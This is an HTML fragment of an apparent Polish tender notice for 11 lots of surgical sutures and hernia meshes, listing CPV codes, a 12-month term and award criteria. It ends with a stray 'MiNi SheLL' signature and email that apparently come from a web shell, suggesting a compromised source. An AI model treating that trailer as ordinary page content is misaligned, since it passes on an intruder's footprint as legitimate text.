<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Szwy wchłanialne I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamowienia wchodzą szwy wchłanialne, pakiet zawiera 36 pozycji, które  szczegółowo określa  załącznik nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Walory techniczne przedmiotu zamówienia - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Szwy wchłanialne II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą szwy wchłanialne, pakiet zawiera 28 pozycji, które szczegółowo określa załącznik nr 5 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Walory techniczne przedmiotu zamówienia - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Szwy wchłanialne III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą szwy wchłanialne, pakiet zawiera 5 pozycji, które szczegółowo określa załącznik nr 5 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Walory techniczne przedmiotu zamówienia - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Szwy wchłanialne IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą szwy wchłanialne, pakiet zawiera 6 pozycji, które szczegółowo określa załącznik nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Walory techniczne przedmiotu zamówienia - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - Szwy niewchłanialne I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą szwy niewchłanialne, pakiet zawiera 8 pozycji, które szczegółowo określa załącznik nr 5 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Walory technicze przedmiotu zamówienia - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - Szwy niewchłanialne II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą szwy niewchłanialne II, pakiet zawiera 10 pozycji, które szczegółowo określa załącznik nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Walory techniczne przedmiotu zamówienia - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - Szwy niewchłanialne III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą szwy niewchłanialne, pakiet zawiera 5 pozycji, które szczegółowo określa załącznik nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Walory techniczne przedmiotu zamówienia - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8 - Szwy wchłanialne V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą szwy wchłanialne, pakiet zawiera 4 pozycje, które szczegółowo określa załącznik nr 5 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Walory techniczne przedmiotu zamówienia - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9 - Szwy wchłanialne VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą szwy wchłanialne, pakiet zawiera 4 pozycje, które szczegółowo określa załącznik nr 5 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Walory techniczne przedmiotu zamówienia - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 10 - Siatki przepuklinowe I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą siatki przepuklinowe, pakiet zawiera 6 pozycji, które szczegółowo określa załącznik nr 5 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 11 - Siatki przepuklinowe II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą siatki przepuklinowe, pakiet zawiera 10 pozycji, które szczegółowo określa załącznik nr 5 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com